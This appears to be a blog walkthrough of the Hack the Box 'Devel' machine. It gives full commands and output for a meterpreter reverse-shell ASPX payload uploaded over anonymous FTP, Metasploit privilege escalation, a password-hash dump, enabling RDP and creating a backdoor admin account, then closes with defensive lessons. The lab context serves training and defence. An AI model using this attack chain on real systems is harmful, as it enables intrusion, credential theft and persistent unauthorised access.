CTF

Pwning a legacy server on Hack the Box is good for a training exercise however what about if we want to think about how to use resrouces for red and blue. Looking at both sides of the coin when thinking about offense really should help people undesrand how to defend better. In the end of the day outside of a tiny tiny fraction of deployment types, you are going to need to be able to explain how to defend regardless of engagement type (vulnerability assessment, penetration test, purple team, red team etc.)

Getting access

I’m not going to talk through every step but here’s the commands you would need to run:

# What doesn’t generally happen IRL

# You have an external pentest you find an FTP server on IIS (legacy) where anon can upload files

#########

SETUP

#########

host=10.10.14.3

target=10.10.10.5

rport=443

lport=1337

###############

ENUMERATION

###############

nmap -sV -sC -A -T 4 -v –open $target

####NMAP OUTPUT #####

PORT STATE SERVICE VERSION

21/tcp open ftp Microsoft ftpd

| ftp-anon: Anonymous FTP login allowed (FTP code 230)

| 03-18-17 02:06AM <DIR> aspnet_client

| 03-17-17 05:37PM 689 iisstart.htm

|_03-17-17 05:37PM 184946 welcome.png

| ftp-syst:

|_ SYST: Windows_NT

80/tcp open http Microsoft IIS httpd 7.5

|_http-server-header: Microsoft-IIS/7.5

|_http-title: IIS7

| http-methods:

| Supported Methods: OPTIONS TRACE GET HEAD POST

|_ Potentially risky methods: TRACE

Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

########

IIS INFO

########

https://docs.microsoft.com/en-us/lifecycle/products/internet-information-services-iis

IIS 7.5 is either Windows 7 or Windows Server 2008 R2

#######################################################

Attempting Exploitation

######################################################

#create a shell using msfvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=1337 -f aspx > devel.aspx

#open a listener

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lport 1337

set lhost 0.0.0.0

set exitonsession false

run -j

ftp $target

ftp [email protected]$target

ls

put ./devel.aspx

curl http://$target/devel.aspx

sessions -i 1

sysinfo

shell

exit

background

use post/multi/recon/local_exploit_suggester

set SESSION 1

run

use exploit/windows/local/bypassuac_eventvwr

set SESSION 1

set lhost tun0

set lport 1338

run

#this will fail

#so try the next one

use exploit/windows/local/ms10_015_kitrap0d

set SESSION 1

set lhost tun0

set lport 1338

run

#grab a shell

sysinfo

background

sessions

sessions -i 2

you are now r00t on the target.

Graphical user interface, text

Description automatically generated with medium confidence

Now remember as well, you can have some fun by not just stopping when you have a user/root flag, remember to explore the machines and steal all the l00t!

Text

Description automatically generated with medium confidence

meterpreter > hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:a450f6000be7df50ee304d0a838d638f:::

babis:1000:aad3b435b51404eeaad3b435b51404ee:a1133ec0f7779e215acc8a36922acf57:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

meterpreter >

You could also have run a range of other methods including:

Enabling Remote Desktop (ensure it’s running, not disabled and service is set to auto and started)

reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f

sc config TermService start= auto

sc start TermService

netsh firewall set service type = remotedesktop mode = enable

Now let’s backdoor the local admins:

net user /add hacker Password123!

net localgroup administrators hacker /add

Graphical user interface

Description automatically generated with low confidence

Now we have a user account with local admin and we have the password (in case we can’t crack the hashes)

Text

Description automatically generated
Graphical user interface

Description automatically generated
Graphical user interface, text, application, email

Description automatically generated

Ok, but this exercise here isn’t about offence really. What it is about is, thinking like a defender!

Let’s think about this more from a defence perspective (in a fictional world where you have a SOC):

  1. Exposed FTP Service on a legacy unsupported server OS to the internet
  2. Exposed IIS Service with default page
  3. FTP had anonymous access
  4. FTP anonymous access had “write” capabilities (put/upload) into the IIS Webroot folder
  5. The web shell was dropped but was not detected by antivirus/antimalware
  6. The web shell was dropped, and the SOC were not aware or did not respond in time
  7. Enumeration did not cause the SOC to respond
  8. The exploit was executed and not blocked by antimalware
  9. The SOC did not detect the execution of the second payload for privilege escalation

When thinking about hacking it’s easy to think about getting r00t and getting l00t, but I’d suggest people start to think more about offensive informed defence. This is where you can start to hopefully see why purple teaming is a really great method/approach/mindset when it comes to defending computer systems.

We can also think about secure configurations and DFIR:

wevtutil qe Security /q:*/System/EventID=4624 /c:10

Text

Description automatically generated

Now I’m not suggesting you try and do DFIR too much on HTB given machines can be reset etc. however it’s a LIVE environment with other players (grabbing stuff from the non-VIP area is easier if you don’t get stuck with performance fun), so you might find some tasty hacker treats on your journey as well.

Anyway whilst I’m sitting listening to the TCM I thought I’d show (but using HTB) how I would do things if I didn’t have a lab and wanted to look at both attack and defence. Other ways are to run honeypots and not only look at internet traffic but also exploit your own servers (the pot ones!).